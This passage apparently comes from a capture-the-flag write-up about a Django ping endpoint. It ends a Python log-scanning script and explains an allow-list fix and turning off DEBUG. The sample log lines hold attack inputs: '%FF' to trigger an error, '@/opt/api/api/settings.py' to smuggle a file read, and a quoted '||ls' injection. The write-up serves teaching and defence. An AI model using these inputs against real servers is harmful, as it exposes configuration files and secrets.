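    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /api/ping?url=%FF HTTP/1.1" 500 41000',
    '10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /api/ping?url=@/opt/api/api/settings.py HTTP/1.1" 500 41000',
]

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print("line %d: %r rejected (%s)" % finding)
```

The validator is deliberately an allow-list rather than a filter for `|`, `;` and friends: the challenge's own filter blocked `||ls` yet still let `@/opt/...` and `%FF` through, which is the usual fate of deny-lists. The other half of the fix is the one Django's own page spells out at the bottom of the dump: with `DEBUG = False` the settings table, the database path and the POST data never leave the server even when an exception does occur.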
